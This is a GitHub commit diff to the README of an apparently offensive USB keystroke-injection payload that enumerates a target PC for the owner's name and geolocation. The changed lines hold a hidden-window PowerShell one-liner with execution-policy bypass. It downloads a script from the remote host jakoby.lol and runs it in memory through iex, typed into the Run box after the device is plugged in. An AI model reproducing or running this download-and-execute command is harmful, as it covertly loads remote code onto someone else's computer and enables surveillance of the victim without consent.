Update README.md

This commit is contained in:
I-Am-Jakoby 2023-01-01 17:19:17 -06:00 committed by GitHub
parent 67f27ffb98
commit 6408f402fa
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -36,7 +36,7 @@ This program enumerates a target PC to get their Name, GeoLocation (Latitude and
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -Ep Bypass iwr jakoby.lol/b8n | iex
powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/b8n | iex
```
<p align="right">(<a href="#top">back to top</a>)</p>